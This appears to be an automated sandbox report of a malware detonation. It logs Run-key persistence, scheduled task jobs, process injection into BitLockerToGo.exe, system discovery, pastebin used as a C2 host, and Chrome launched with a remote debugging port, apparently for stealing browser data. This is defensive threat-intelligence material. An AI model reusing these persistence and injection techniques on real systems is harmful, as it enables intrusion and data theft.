| Set value (str) | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e8635ad464.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110390101\\e8635ad464.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\351688018b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110350101\\351688018b.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6dde3a1917.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110360101\\6dde3a1917.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 6016 set thread context of 5848 | N/A | C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe |
| PID 5764 set thread context of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe |
| PID 3380 set thread context of 960 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 2016 set thread context of 5616 | N/A | C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe | C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe |
| PID 5456 set thread context of 7052 | N/A | C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 7128 set thread context of 6532 | N/A | C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110340101\2fec6d6e6a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3MTOO6AB2FMOS3KK0QLMB4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\rvhetm\ktgtc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110330101\9d1cfbdeaf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110310101\b0fc94a113.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110350101\351688018b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110360101\6dde3a1917.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10110380101\1109dfe086.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857100048501121" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe
"C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe"
C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe
"C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
"C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9ac31cc40,0x7ff9ac31cc4c,0x7ff9ac31cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2176,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2180 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3360 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4176,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4188 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4604,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4632 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3200,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4260 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4488,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
